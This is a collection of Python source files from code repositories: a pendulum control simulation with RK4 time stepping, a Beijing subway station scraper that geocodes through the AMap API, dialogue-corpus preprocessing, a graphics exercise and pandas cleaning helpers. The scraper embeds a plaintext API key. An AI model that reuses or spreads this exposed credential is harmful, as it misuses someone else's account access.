self.frequency = wave.get('frequency', np.pi/2)\n        self.control_start_time = self.dt * self.wave_phi.shape[0]\n        self.prev_length = self.wave_phi.shape[0]\n        self.entire_t = np.arange(0, self.dt * self.prev_length + self.max_t, self.dt)\n\n        self.pose_constrain_L = attributes.get('constrain_L', False)\n\n        # Below is an untested idea:\n        self.delta_shrinkage = .8\n        # initialize the Asymptotic control mode\n        self.asymptotic_control_on = attributes.get('asymptotic_mode', True)\n        if self.asymptotic_control_on:\n            self.delta = attributes.get('delta_asymptotic_const', 0.2)\n\n            # asymptotic control parameters sequence\n            self.asym_control_phi = np.zeros(self.steps)\n            self.asym_control_dphi = np.zeros(self.steps)\n\n            # self.asym_control_ddphi = np.zeros(self.steps)\n            self.asym_control_L = np.zeros(self.steps)\n            self.asym_control_L[0] = self.l0\n            self.asym_control_dL = np.zeros(self.steps)\n\n        else:\n            pass\n\n        # initialize the Adaptive control mode\n        self.adaptive_control_on = attributes.get('adaptive_mode', False)\n        if self.adaptive_control_on:\n            self.delta_adaptive_const = attributes.get('delta_adaptive_const', 0.15)\n            self.delta = attributes.get('delta_adaptive_const', 0.2)\n\n            # adaptive control parameters sequence\n            self.adap_control_phi = np.zeros(self.steps)\n
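            # note (restating delta_update below, not a new rule): in adaptive mode, delta is\n            # rescaled on the fly as delta_adaptive_const / max|phi| over the last half swing,\n            # so the feedback gain grows as the oscillation decays\n            self.adap_control_dphi = 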
np.zeros(self.steps)\n\n            # self.adap_control_ddphi = np.zeros(self.steps)\n            self.adap_control_length = np.zeros(self.steps)\n            self.adap_control_dlength = np.zeros(self.steps)\n\n            self.adap_delta_sequence = np.zeros(self.steps)\n        else:\n            pass\n\n        self.no_control_on = attributes.get('no_control_mode', False)\n        # oscillating control sequence\n        if self.no_control_on:\n            self.oscillating_phi = np.zeros(self.steps)\n            self.oscillating_dphi = np.zeros(self.steps)\n            self.oscillating_ddphi = np.zeros(self.steps)\n        else:\n            pass\n\n        # The pendulum length and length derivative at the current time step\n        self.L = self.l0\n        self.dL = 0\n\n        # The time-marching scheme to use: 1 = Forward Euler, 2 = RK4\n        self.time_marching_method = attributes.get('time-marching scheme', 2)\n\n        # The root folder path and images folder path\n        self.ROOT_PATH = os.getcwd()\n        self.IMG_PATH = os.path.join(self.ROOT_PATH, 'images')\n\n        # plot setting\n        self.plot_trigger = attributes.get('plot', False)\n        self.ylim = np.max(self.wave_phi) * 1.1\n        # save fig and show fig indicator\n        self.save_fig = attributes.get('save_fig', False)\n        self.show_fig = attributes.get('show_fig', False)\n        # saving picture in designated format\n        self.format_fig = attributes.get('format_fig', '.png')\n        # save data\n        self.save_data = attributes.get('save_data', True)\n\n    # ==================================== EQUATION OF MOTION ====================================\n    def fixed_length_eom(self, x):\n        '''\n        ====================================\n        phi_ddot = - g * sin(phi) / L;  linearized here as phi_ddot = -w^2 * phi\n        ====================================\n        Forward-in-time discretization:\n        (phi^{n+1} - phi^n) / dt = phi_dot^n\n        (phi_dot^{n+1} - phi_dot^n) / dt = -w^2 * phi^n\n        ====================================\n        which gives the update\n        phi^{n+1} = phi^n + dt * phi_dot^n\n        phi_dot^{n+1} = phi_dot^n - dt * w^2 * phi^n\n        ====================================\n        :return:\n        '''\n        x_dot = np.empty((2, ))\n        x_dot[0] = x[1]\n        x_dot[1] = -self.frequency**2 * x[0]\n        return x_dot\n\n    def variable_length_eom(self, x):\n        '''\n        First compute the length for the states x;\n        Second compute the time-change of the equation;\n        phi_ddot = [-2 * L_dot * phi_dot - g * sin(phi)] / L\n        states = [x0, x1]' = [phi, dphi]'\n        :return:\n        '''\n        # Here we can't directly compute Ldot, otherwise it would fall into an infinite loop.\n        # Use Ldot = L0*delta*([d(phi)/dt]^2 + phi * d^2(phi)/dt^2), plug it back into the system dynamic\n        L = self.compute_length(x)\n\n        f = np.empty((2, ))\n        f[0] = x[1]\n        if abs(L + self.l0 * (1 + 3 * self.delta * x[0] * x[1])) > 1e-4:\n            # Regarding the expression to compute f[1], use L instead of plugging L=L0[1+delta*phi*d(phi)/dt] directly,\n            # easier to add a constraint on L(t)\n            f[1] = (-2 * self.l0 * self.delta * x[1]**3 - self.g * np.sin(x[0])) / \\\n                (L + self.l0 * (1 + 3 * self.delta * x[0] * x[1]))\n        else:\n            f[1] = 0\n        # f[1] = (-2 * self.l0 * self.delta * x[1]**3 - self.g * np.sin(x[0])) / \\\n        #     (L + self.l0 * (1 + 3 * self.delta_shrinkage * self.delta * x[0] * x[1]))\n            print('Invalid values for denominator encountered in the computation of variable-length equation of motion')\n            print('Set it to be 0 temporarily.')\n        return f\n\n    def compute_length(self, x):\n        L = self.l0 * (1 + self.delta * x[0] * x[1])\n        if self.pose_constrain_L:\n            L = np.clip(L, self.Lmin, self.Lmax)\n        else:\n            pass\n        return L\n\n    def compute_length_dot(self, x):\n        f = self.variable_length_eom(x)\n        Ldot = self.l0 * self.delta * (x[1]**2 + x[0]*f[1])\n        if self.pose_constrain_L:\n            Ldot = np.clip(Ldot, self.Ldotmin, self.Ldotmax)\n        else:\n            pass\n        return Ldot\n\n    def delta_update(self, t):\n        \"\"\"\n        Adaptive control: to accelerate the convergence of the pendulum, keep the amplitude of the\n        length-based control input large enough\n        :param t: time instance\n        :return:\n        \"\"\"\n        # combine controlled dphi with the dphi before control starts\n        dphi_sequence = np.hstack((self.wave_dphi, self.adap_control_dphi[:t]))\n        # 1st find the positions that dphi <= 1e-2/2\n        dphi_zero_list = np.where(np.abs(dphi_sequence) <= 1e-2/2)[0]\n        if len(dphi_zero_list) > 0:\n            # 2nd find the last group of dphi <= 1e-2/2\n            last_dphi_zero = utils.last_consecutives(dphi_zero_list)\n            # 3rd find the largest amplitude of the angle in the last cycle\n            phi_sequence = np.hstack((self.wave_phi, self.adap_control_phi[:t]))\n            self.delta_adaptive = self.delta_adaptive_const / np.abs(np.max(phi_sequence[last_dphi_zero]))\n        else:\n            # dphi has not finished one peak yet\n            self.delta_adaptive = self.delta_adaptive_const / 1\n        self.adap_delta_sequence[t] = np.copy(self.delta_adaptive)\n\n    # ==================================== MAIN SCRIPT ====================================\n    def free_pendulum_oscillation(self):\n        '''\n\n        Reference link:http://hplgit.github.io/Programming-for-Computations/pub/p4c/._p4c-solarized-Python022.html\n        :return:\n        '''\n        for step, _ in enumerate(self.time):\n            if step == 0:\n                state = np.hstack((self.wave_phi[-1], self.wave_dphi[-1]))\n            else:\n                state = np.hstack((self.oscillating_phi[step - 1], self.oscillating_dphi[step - 1]))\n            # time marching ODE\n            self.oscillating_phi[step], self.oscillating_dphi[step] = self.time_marching(state, self.fixed_length_eom)\n\n    def asymptotic_control_pendulum_oscillation(self):\n        for i in range(self.steps):\n            if i == 0:\n                state = np.hstack((self.wave_phi[-1], self.wave_dphi[-1]))\n            else:\n                state = np.hstack((self.asym_control_phi[i-1], self.asym_control_dphi[i-1]))\n\n            # update the length of the pendulum\n            self.asym_control_L[i] = self.compute_length(state)\n            self.asym_control_dL[i] = self.compute_length_dot(state)\n\n            # time marching the system dynamic\n
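            # consistency note: differentiating L = L0 * (1 + delta * phi * dphi) gives\n            # Ldot = L0 * delta * (dphi**2 + phi * ddphi), which is exactly what\n            # compute_length_dot evaluates via the equation of motion\n            self.asym_control_phi[i], self.asym_control_dphi[i] = 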
self.time_marching(state, self.variable_length_eom)\n\n    def adaptive_control_pendulum_oscillation(self):\n        for step, _ in enumerate(self.time):\n            if step == 0:  # assemble state -> ODE, full_state -> length\n                state = np.hstack((self.wave_phi[-1], self.wave_dphi[-1]))\n            else:\n                state = np.hstack((self.adap_control_phi[step - 1], self.adap_control_dphi[step - 1]))\n                full_state = np.hstack(\n                    (self.adap_control_phi[step - 1], self.adap_control_dphi[step - 1], self.adap_control_ddphi[step - 1]))\n            # update delta\n            self.delta_update(step)\n\n            # update length <- phi, phi_dot, phi_double_dot\n            self.adap_control_length[step], self.adap_control_dlength[step] = self.length_update(full_state)\n\n            # assemble length vector\n            length = np.hstack((self.adap_control_length[step], self.adap_control_dlength[step]))\n\n            # update phi_double_dot, this is for updating the length at the next time step\n            self.adap_control_ddphi[step] = self.update_ddphi(state, length)\n\n            # assemble the ODE\n            func = partial(self.variable_length_eom, input=length)\n\n            # time marching ODE\n            self.adap_control_phi[step], self.adap_control_dphi[step] = self.time_marching(state, func)\n\n    def main(self):\n        if self.no_control_on:\n            self.free_pendulum_oscillation()\n        else:\n            pass\n\n        # invoke the asymptotic control\n        if self.asymptotic_control_on:\n            self.asymptotic_control_pendulum_oscillation()\n        else:\n            pass\n\n        # invoke the adaptive control\n        if self.adaptive_control_on:\n            self.adaptive_control_pendulum_oscillation()\n        else:\n            pass\n\n        # plot trigger\n        if self.plot_trigger:\n            self.plot()\n        else:\n            pass\n\n        # save data\n        if self.save_data:\n            self.data_saver()\n\n    # ==================================== TIME MARCHING SCHEME ====================================\n\n    def forward_euler(self, x, func):\n        x_dot = func(x)\n        x_new = x + x_dot * self.dt\n        return x_new\n\n    def runge_kutta4(self, x, func):\n        f1 = func(x)\n        f2 = func(x + self.dt/2 * f1)\n        f3 = func(x + self.dt/2 * f2)\n        f4 = func(x + self.dt * f3)\n        x_new = x + self.dt/6 * (f1 + 2*f2 + 2*f3 + f4)\n        return x_new\n\n    def time_marching(self, x, func):\n        if self.time_marching_method == 1:\n            # Forward Euler\n            x_new = self.forward_euler(x, func)\n        elif self.time_marching_method == 2:\n            # RK4\n            x_new = self.runge_kutta4(x, func)\n        else:\n            # a new scheme would need to be implemented here\n            x_new = np.zeros(2)\n
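            # RK4 (4th order) is the default; Forward Euler (1st order) is cheaper per step\n            # but, as a rule of thumb, needs a much smaller dt for comparable accuracy\n            raise ValueError('A new time-marching scheme needs to be specified. 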
Otherwise set \"time-marching scheme\"=2.')\n return x_new[0], x_new[1]\n\n # ==================================== PLOT ====================================\n def plot(self):\n self.phi_plot()\n self.phase_space_plot()\n self.length_plot()\n # self.delta_plot()\n # self.phi_dphi_time_plot()\n self.energy_plot()\n # self.frequency_plot()\n\n def phi_plot(self):\n plt.figure(figsize=[16, 9])\n plt.grid()\n self.control_indicator_plot()\n if self.no_control_on:\n self.free_pendulum_plot()\n self.control_pendulum_plot()\n plt.legend()\n self.fig_save_and_show('phi')\n\n def control_indicator_plot(self):\n y = np.linspace(-1 * self.ylim, self.ylim, 200)\n t = self.control_start_time * np.ones(y.shape[0])\n plt.plot(t, y, 'g-.', label=r'$Control\\ starts$')\n\n def free_pendulum_plot(self):\n entire_free_phi = np.hstack((self.wave_phi, self.oscillating_phi))\n plt.plot(self.entire_t, entire_free_phi, 'b-', label=r'$\\phi(t) - No Control$')\n plt.xlabel(r'$t$', fontsize=21)\n plt.ylabel(r'$\\phi(t)$', fontsize=21, rotation=0)\n\n def control_pendulum_plot(self):\n control_t = np.arange(0, self.max_t, self.dt) + self.control_start_time\n if self.asymptotic_control_on:\n plt.plot(control_t, self.asym_control_phi, 'r--', label=r'$\\phi(t)-Controlled$')\n\n if self.adaptive_control_on:\n plt.plot(control_t, self.adap_control_phi, 'k-.', label=r'$\\phi(t)-Adaptive\\ \\delta$')\n\n def phase_space_plot(self):\n # 2D phase plot\n plt.figure(figsize=[16, 9])\n plt.gca().set_aspect('equal', adjustable='box')\n plt.grid()\n plt.scatter(self.asym_control_phi[0], self.asym_control_dphi[0], c='b', marker='s', label='initial')\n asym_x_range = asym_y_range = adap_x_range = adap_y_range = np.ones(1)\n\n if self.asymptotic_control_on:\n # plot the asymptotic convergence of phi(t)\n plt.plot(self.asym_control_phi, self.asym_control_dphi, 'r--', label='Asymptotic')\n self.phase_space_arrow_plot(self.asym_control_phi, self.asym_control_dphi)\n asym_x_range = np.ptp(self.asym_control_phi, axis=0)\n asym_y_range = np.ptp(self.asym_control_dphi, axis=0)\n\n if self.adaptive_control_on:\n # plot the exponential convergence of phi(t)\n plt.plot(self.adap_control_phi, self.adap_control_dphi, 'k--', label='Adaptive')\n self.phase_space_arrow_plot(self.asym_control_phi, self.asym_control_dphi)\n adap_x_range = np.ptp(self.adap_control_phi, axis=0)\n adap_y_range = np.ptp(self.adap_control_dphi, axis=0)\n\n # r = np.max(np.hstack((adap_y_range, asym_y_range, adap_x_range, asym_x_range))) * 1.2\n # plt.ylim(0 - r / 2, 0 + r / 2)\n # plt.xlim(0 - r / 2, 0 + r / 2)\n r = 2.0\n plt.ylim(0 - r, 0 + r)\n plt.xlim(0 - r, 0 + r)\n\n plt.xlabel(r'$\\phi(t)$', fontsize=21)\n plt.ylabel(r'$\\dot{\\phi}(t)$', fontsize=21, rotation=0)\n plt.legend()\n self.fig_save_and_show('phi_dphi')\n\n def phase_space_arrow_plot(self, phi, dphi):\n # plot 10 arrows for every 100/1000 steps; if the steps < 100, plot just one arrow\n if self.steps < 100:\n num_arrows = 1\n arrow_position_sequence = np.array([int(round(self.steps/2))])\n else:\n num_arrows = 5\n arrow_position_sequence = np.array([int(step) for step in np.linspace(0, self.steps - 2, num_arrows)])\n\n for num, pos in enumerate(arrow_position_sequence[1:]):\n plt.annotate('', xy=(phi[pos+1], dphi[pos+1]), xytext=(phi[pos], dphi[pos]),\n arrowprops={'arrowstyle': '->, head_width=.5, head_length=1.5', 'color': 'r'}, va='center')\n\n def phi_dphi_time_plot(self):\n # Debug use\n if self.asymptotic_control_on:\n plt.figure(figsize=[16, 9])\n plt.grid()\n plt.plot(self.time, 
self.asym_control_phi, 'r', label=r'$\\phi(t)$')\n plt.plot(self.time, self.asym_control_dphi, 'b', label=r'$\\dot{\\phi}(t)$')\n plt.xlabel(r'$t$', size=21)\n plt.legend()\n self.fig_save_and_show('phi_dphi_time_asym')\n\n if self.adaptive_control_on:\n plt.figure(figsize=[16, 9])\n plt.grid()\n plt.plot(self.time, self.adap_control_phi, 'r', label=r'$\\phi(t)$')\n plt.plot(self.time, self.adap_control_dphi, 'b', label=r'$\\dot{\\phi}(t)$')\n plt.xlabel(r'$t$', size=21)\n plt.legend()\n self.fig_save_and_show('phi_dphi_time_adap')\n\n def energy_plot(self):\n plt.figure(figsize=[16, 9])\n plt.grid()\n if self.asymptotic_control_on:\n energy_asym = 1/2 * self.m * ((self.asym_control_L * self.asym_control_dphi)**2 + self.asym_control_dL**2) \\\n + self.m * self.g * (-np.cos(self.asym_control_phi) * self.asym_control_L + self.l0)\n plt.plot(self.time, energy_asym, 'r', label=r'$V$ - Asymptotic')\n\n if self.adaptive_control_on:\n energy_adap = 1/2 * ((self.adap_control_length * self.adap_control_dphi)**2 + self.adap_control_dlength**2) \\\n + self.g*self.adap_control_length*(1-np.cos(self.adap_control_phi))\n plt.plot(self.time, energy_adap, 'k--', label=r'$V$ - Adaptive')\n plt.xlabel(r'$t$', size=21)\n plt.ylabel(r'$V(t)$', size=21, rotation=0, labelpad=22)\n plt.legend()\n self.fig_save_and_show('energy')\n\n def frequency_plot(self):\n plt.figure(figsize=[16, 9])\n plt.grid()\n if self.asymptotic_control_on:\n omega_asym = np.sqrt(self.g / self.asym_control_L - (self.asym_control_dL/self.asym_control_L)**2)\n plt.plot(self.time, omega_asym, 'r', label=r'$\\omega$ - Asymptotic')\n\n if self.adaptive_control_on:\n omega_adap = np.sqrt(self.g / self.adap_control_length - (self.adap_control_dlength/self.adap_control_length)**2)\n plt.plot(self.time, omega_adap, 'k--', label=r'$\\omega$- Adaptive')\n plt.xlabel(r'$t$', size=21)\n plt.ylabel(r'$\\omega(t)$', size=21, rotation=0)\n plt.legend()\n self.fig_save_and_show('frequency')\n\n def length_plot(self):\n # length plot\n plt.figure(figsize=[16, 9])\n plt.grid()\n\n # L plot\n if self.asymptotic_control_on:\n # plot the asymptotic pendulum length\n entire_asym_length = np.hstack((self.l0 * np.ones(self.prev_length), self.asym_control_L))\n plt.plot(self.entire_t, entire_asym_length, 'r--', label='Asymptotic')\n\n if self.adaptive_control_on:\n # plot the adaptive pendulum length\n entire_adap_length = np.hstack((self.l0 * np.ones(self.prev_length), self.adap_control_length))\n plt.plot(self.entire_t, entire_adap_length, 'k-.', label='Adaptive')\n plt.xlabel(r'$t$', fontsize=21)\n plt.ylabel(r'$\\frac{L(t)}{L_0}$', fontsize=21, rotation=0, labelpad=18)\n plt.legend()\n self.fig_save_and_show('length')\n\n # dL plot\n plt.figure(figsize=[16, 9])\n plt.grid()\n\n if self.asymptotic_control_on:\n # plot the asymptotic pendulum dlength\n entire_asym_dlength = np.hstack((np.zeros(self.prev_length), self.asym_control_dL))\n plt.plot(self.entire_t, entire_asym_dlength, 'r--', label='Asymptotic')\n if self.adaptive_control_on:\n # plot the adaptive pendulum length\n entire_adap_dlength = np.hstack((np.zeros(self.prev_length), self.adap_control_dlength))\n plt.plot(self.entire_t, entire_adap_dlength, 'k-.', label='Adaptive')\n plt.xlabel(r'$t$', fontsize=21)\n plt.ylabel(r'$\\dot{L}(t)$', fontsize=21, rotation=0, labelpad=18)\n plt.legend()\n self.fig_save_and_show('dlength')\n\n def delta_plot(self):\n plt.figure(figsize=[16, 9])\n plt.grid()\n\n if self.asymptotic_control_on:\n # plot the asymptotic delta (const)\n entire_asym_delta = 
self.delta * np.ones(self.entire_t.shape[0])\n            plt.plot(self.entire_t, entire_asym_delta, 'r--', label='Asymptotic')\n\n        if self.adaptive_control_on:\n            entire_adap_delta = np.hstack((np.zeros(self.prev_length), self.adap_delta_sequence))\n            plt.plot(self.entire_t, entire_adap_delta, 'k-.', label='Adaptive')\n        plt.legend()\n        plt.xlabel(r'$t$', fontsize=21)\n        plt.ylabel(r'$\\delta(t)$', fontsize=21, rotation=0)\n        self.fig_save_and_show('delta')\n\n    def fig_save_and_show(self, name):\n        if self.save_fig:\n            name = os.path.join(self.IMG_PATH, name) + self.format_fig\n            plt.savefig(name, format=self.format_fig[1:], dpi=300)\n        if self.show_fig:\n            plt.show()\n\n    def data_saver(self):\n        data = {\n            'asym_phi': self.asym_control_phi,\n            'asym_dphi': self.asym_control_dphi,\n            'asym_L': self.asym_control_L,\n            'asym_dL': self.asym_control_dL\n        }\n        io.savemat('pendulum_data.mat', data)\n\n\nif __name__ == \"__main__\":\n    # T: total control time\n    T = 10\n    dt = 0.02\n    g = 9.8\n    m = 1\n    l = 1\n\n    # t_length: time length before control starts\n    t_length = dt\n    t = np.arange(0, t_length, dt)\n\n    # 1st: simple sin wave\n    # signal = {\n    #     'phi': a * np.sin(w0 * t),\n    #     'dphi': a * w0 * np.cos(w0 * t),\n    # }\n\n    signal = {\n        'phi': -2 * np.ones(1),\n        'dphi': 3 * np.ones(1),\n    }\n\n    properties = {\n        'm': m,\n        'max_t': T,\n        'dt': dt,\n        'adaptive_mode': False,\n        'delta_adaptive_const': .15,\n        'asymptotic_mode': True,\n        'delta_asymptotic_const': .05,\n        'l0': l,\n        'constrain_L': True,\n        'Ldotmax': 5,\n        'Ldotmin': -5,\n        'Lmax': 1.5,\n        'Lmin': 0.5,\n        'g': g,\n        'plot': True,\n        'save_fig': True,\n        'show_fig': False,\n        'save_data': False,\n    }\n    # ================\n    pendu = Pendulum(signal, properties)\n    pendu.main()\n","repo_name":"kimukook/variable_length_oscillating_pendulum","sub_path":"pendulum.py","file_name":"pendulum.py","file_ext":"py","file_size_in_byte":25318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"42417943480","text":"import requests\r\nfrom bs4 import BeautifulSoup\r\nimport pandas as pd\r\nheader={'user-agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36'}\r\n# get a BeautifulSoup object from the request url\r\ndef get_page_content(request_url):\r\n    # fetch the page content\r\n    html = requests.get(request_url, headers = header, timeout = 10)\r\n    content = html.text\r\n    print(content)\r\n    soup = BeautifulSoup(content, 'html.parser', from_encoding = 'utf-8')\r\n    return soup\r\nif __name__== '__main__':\r\n    request_url = 'https://ditie.mapbar.com/beijing_line/'\r\n    soup = get_page_content(request_url)\r\n    \r\n    df = pd.DataFrame(columns = ['name', 'site'])\r\n    subways = soup.find_all('div', class_ = 'station')\r\n    for subway in subways:\r\n        route_name = subway.find('strong', class_ = 'bolder').text\r\n        routes = subway.find('ul')\r\n        routes = routes.find_all('a')\r\n        \r\n        # save the name for every route\r\n        for route in routes:\r\n            temp = {'name' : route.text, 'site': route_name}\r\n            df = df.append(temp, ignore_index = True)\r\n        \r\n    df['city'] = '北京'\r\n    print(df)\r\n    df.to_csv('subway.csv',index = False, encoding = 'utf-8')\r\n\r\n# use the Gaode (AMap) API\r\nimport re\r\n# get the location for the given keyword and city\r\n# the link the teacher gave in class no longer works; a new api key was requested: key = b1d4267a269c108cb148f1b95183890c\r\ndef get_location(keyword, city):\r\n    request_url = 'http://restapi.amap.com/v3/place/text?key=b1d4267a269c108cb148f1b95183890c&keywords='+ keyword + '&types=&city=' + city + '&children=1&offset=1&page=1&extensions=all'\r\n
timeout = 10)\r\n    data.encoding = 'utf-8'\r\n    data = data.text\r\n    # the trailing ? makes the match lazy\r\n    # .* is greedy and matches as much as it possibly can\r\n    # .*? cancels the greediness: after one match, the rest of the regex takes over\r\n    pattern = 'location\":\"(.*?),(.*?)\"'\r\n    # extract longitude and latitude\r\n    result = re.findall(pattern, data)\r\n\r\n    try:\r\n        return result[0][0], result[0][1]\r\n    except:\r\n        return get_location(keyword.replace('站',''), city)\r\n\r\nif __name__ == '__main__':\r\n    df = pd.read_csv('./subway.csv', index_col = None)\r\n    print(df.head())\r\n    \r\n    # df['longtitude'], df['latitude'] = None, None\r\n    \r\n    # for index, row in df.iterrows():\r\n    #     name, city = row['name'], row['city']\r\n    #     longtitude, latitude = get_location(name, city) \r\n    #     df.iloc[index]['longtitude'] = longtitude\r\n    #     df.iloc[index]['latitude'] = latitude\r\n    #     print(longtitude, latitude)\r\n    # df.to_csv('subway.csv', index = False)\r\n    \r\n    longtitudes = []\r\n    latitudes = []\r\n    for index, row in df.iterrows():\r\n        name, city = row['name'], row['city']\r\n        longtitude, latitude = get_location(name, city) \r\n        longtitudes.append(longtitude)\r\n        latitudes.append(latitude)\r\n    longtitudes = pd.Series(longtitudes)\r\n    latitudes = pd.Series(latitudes)\r\n    df['longtitude'] = longtitudes\r\n    df['latitude'] = latitudes\r\n    df.to_csv('subway.csv', index = False)\r\n    df.head()","repo_name":"JadenQ/Gaode_Map_subway_station_Dijkstra","sub_path":"preprocessing_location.py","file_name":"preprocessing_location.py","file_ext":"py","file_size_in_byte":3151,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"47805314172","text":"# maluuba\r\nimport re\r\nimport numpy as np\r\n\r\ndef preprocess():\r\n\tcorrect = dict()\r\n\tfor line in open('map.tsv', encoding='utf-8'):\r\n\t\ta, b = line.strip('\\n').split('\\t')\r\n\t\tcorrect[a.lower().strip()] = b.lower().strip()\r\n\r\n\tlines = []\r\n\tn = 0\r\n\tfor line in open(DIR+'/raw.txt', encoding='utf-8'):\r\n\t\tline = line.strip('\\n').replace(\"' \",\" '\")\r\n\t\tturns = []\r\n\t\tfor turn in line.split('\\t'):\r\n\t\t\t# keep only letters, digits and basic punctuation; everything else is stripped\r\n\t\t\tturn = re.sub(r\"[^A-Za-z0-9():,\\.!?' 
]\", \"\", turn)\r\n\t\t\taa = turn.split()\r\n\t\t\tbb = []\r\n\t\t\tfor a in aa:\r\n\t\t\t\tbb.append(correct.get(a, a))\r\n\t\t\tturns.append(' '.join(bb))\r\n\t\tlines.append('\\t'.join(turns))\r\n\t\tn += 1\r\n\t\tif n%1e3 == 0:\r\n\t\t\tprint('processed %ik'%(n/1e3))\r\n\r\n\twith open(DIR+'/cleaned.txt', 'w', encoding='utf-8') as f:\r\n\t\tf.write('\\n'.join(lines))\r\n\r\n\r\ndef load_vocab():\r\n\ti = 0\r\n\twordtoix = dict()\r\n\tixtoword = dict()\r\n\tfor word in open(DIR+'/vocab.txt'):\r\n\t\tword = word.strip('\\n')\r\n\t\twordtoix[word] = i\r\n\t\tixtoword[i] = word\r\n\t\ti += 1\r\n\treturn ixtoword, wordtoix\r\n\r\n\r\ndef compress():\r\n\timport cPickle\r\n\t\r\n\tx = []\r\n\tloadpath = DIR + '/cleaned.txt'\r\n\tprint('reading '+loadpath)\r\n\twith open(loadpath, 'rb') as f:\r\n\t\tfor line in f:\r\n\t\t\tx.append(line.strip('\\n').strip())\r\n\r\n\tn = len(x)\r\n\tprint('shuffling %i lines'%n)\r\n\tii = list(range(n))\r\n\tnp.random.seed(9)\r\n\tnp.random.shuffle(ii)\r\n\r\n\tprint('splitting...')\r\n\tsent = []\r\n\tii_picked = []\r\n\tfor i in ii:\r\n\t\tline = x[i].split('\\t')\r\n\t\tif len(line) == TURNS and all([len(z)= 300):\n drawCircle(win, p1, 30, \"red\", \"black\")\n elif (p1.getY() >= 300) and (p1.getX() < 300):\n drawCircle(win, p1, 30, \"\", \"blue\")\n else:\n drawCircle(win, p1, 30, \"blue\", \"black\")\n \ndef circles2():\n win = GraphWin(\"circles\", 600, 600)\n for vertical in range(450, 571, 60):\n for horizontal in range(30, 571, 60):\n p1 = win.getMouse()\n centers = Point(horizontal, vertical)\n if (p1.getY() < 300) and (p1.getX() < 300):\n drawCircle(win, centers, 30, \"\", \"red\")\n elif (p1.getY() < 300) and (p1.getX() >= 300):\n drawCircle(win, centers, 30, \"red\", \"black\")\n elif (p1.getY() >= 300) and (p1.getX() < 300):\n drawCircle(win, centers, 30, \"\", \"blue\")\n else:\n drawCircle(win, centers, 30, \"blue\", \"black\")","repo_name":"up816571/CodeArchive","sub_path":"Python/Test3.py","file_name":"Test3.py","file_ext":"py","file_size_in_byte":1372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"8799776254","text":"import pandas as pd\nimport numpy as np\n\ndef time_frame_getter(data: pd.DataFrame, time_frame: str) -> pd.DataFrame:\n \"\"\"\n Function for turning 'daily' datasets into either 'weekly' or 'monthly'.\n\n Args:\n data (pd.DataFrame): pandas DataFrame that has column 'close'\n time_frame (str): Either 'W-FRI' for weekly or 'M' for monthly\n\n Returns:\n pd.DataFrame: Returns pandas DataFrame with the specified time_frame.\n \"\"\"\n\n return data.resample(time_frame).ohlc()\n\n\ndef nan_handler(df: pd.DataFrame) -> pd.DataFrame:\n \"\"\"Handles nan values in a price-dataframe. 
Takes average, closing price, forward fill and lastly backward fill if necessary\n\n Args:\n df (pd.DataFrame): dataframe that has columns 'close', 'high', 'low', 'open'\n\n Returns:\n [pd.DataFrame]: dataframe without nan values\n \"\"\"\n bool = (df['high'].notna()) & (df['open'].isna()) & (df['low'].notna())\n df.loc[bool, 'open'] = (df.loc[bool, 'high'] + df.loc[bool, 'low'])/2\n for label in ['open', 'low', 'high']:\n df.loc[(df[f'{label}'].isna()) & (df['close'].notna()), f'{label}'] = df.loc[(df[f'{label}'].isna()) & (df['close'].notna()), 'close']\n return df.fillna(method='ffill').fillna(method='bfill')\n\ndef zero_handler(df: pd.DataFrame) -> pd.DataFrame:\n \"\"\"Handles zero-values that can be interpreted as nan-values in a price-dataframe.\n\n Args:\n df (pd.DataFrame): dataframe that has columns 'close', 'high', 'low', 'open'\n\n Returns:\n [pd.DataFrame]: df that does not have any zero-values where it should not.\n \"\"\"\n bool = (df['high'] != 0) & (df['open'] == 0) & (df['low'] != 0)\n df.loc[bool, 'open'] = (df.loc[bool, 'high'] + df.loc[bool, 'low'])/2\n for label in ['open', 'low', 'high']:\n df.loc[(df[f'{label}'] == 0) & (df['close'] != 0), f'{label}'] = df.loc[(df[f'{label}'] == 0) & (df['close'] != 0), 'close']\n if (df[f'{label}'] == 0).sum() > 0:\n df.loc[(df[f'{label}'] == 0), f'{label}'] = df.loc[(df[f'{label}'] == 0), f'{label}'].replace(0, np.nan).fillna(method='ffill').fillna(method='bfill')\n return df","repo_name":"Erkiish/KEX-","sub_path":"Data/Data_Cleaning.py","file_name":"Data_Cleaning.py","file_ext":"py","file_size_in_byte":2124,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"22407232715","text":"import os\nfrom typing import Tuple\n\n\nclass BasePreprocessingClass:\n def __init__(self) -> None:\n pass\n\n @staticmethod\n def _read_csv(path: str):\n import pandas as pd\n return pd.read_csv(path)\n\n @staticmethod\n def _get_lists(src: str, filetype: str = \"jpg\") -> Tuple[list, list]:\n import glob\n images, categories = [], []\n\n for cat in glob.glob(src + \"/*\"):\n image_list = glob.glob(cat + f\"/*.{filetype}\")\n cat_list = [os.path.basename(cat)] * len(image_list)\n\n images += glob.glob(cat + f\"/*.{filetype}\")\n categories += cat_list\n\n return images, categories\n\n @staticmethod\n def _get_lists_with_annotations(image_src: str, annotations_src: str,\n image_type=\"jpg\", annotations_type=\"xml\"):\n import glob\n\n images, categories, annotations = [], [], []\n\n for cat in glob.glob(image_src + \"/*\"):\n images += sorted(glob.glob(cat + f\"/*.{image_type}\"))\n categories += [os.path.basename(cat)] * len(glob.glob(cat + f\"/*.{image_type}\"))\n\n for annot in glob.glob(annotations_src + \"/*\"):\n if annotations_type == \"\":\n annotations += sorted(glob.glob(annot + \"/*\"))\n else:\n annotations += sorted(glob.glob(annot + f\"/*.{annotations_type}\"))\n\n return images, categories, annotations\n\n @staticmethod\n def _get_max_threads():\n return int(os.popen('grep -c cores /proc/cpuinfo').read())\n\n def _check_num_threads(self, n: int):\n if n == -1:\n n = self._get_max_threads()\n else:\n assert n <= self._get_max_threads(), \"Number of Threads must be less than {}\".format(\n self._get_max_threads())\n assert n > 0, \"Number of threads should be at least 1\"\n\n return 
